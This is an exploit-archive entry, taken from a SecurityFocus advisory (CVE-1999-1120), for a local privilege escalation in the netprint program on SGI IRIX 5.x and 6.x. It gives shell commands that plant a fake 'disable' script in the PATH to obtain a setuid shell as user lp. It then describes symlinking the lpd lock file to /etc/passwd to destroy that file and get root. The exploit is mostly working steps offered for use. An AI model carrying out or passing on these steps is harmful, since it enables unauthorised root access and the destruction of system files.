source: http://www.securityfocus.com/bid/395/info A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp. % cat > /tmp/disable cp /bin/sh /tmp/lpshell chmod 4755 /tmp/lpshell ^D % set path=(. $path) % netprint -n blah -h blah -p blah 1-234 % /tmp/lpshell However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.
Related ExploitsTrying to match CVEs (1): CVE-1999-1120
Trying to match OSVDBs (1): 993
Other Possible E-DB Search Terms: SGI IRIX 6.4 netprint, SGI IRIX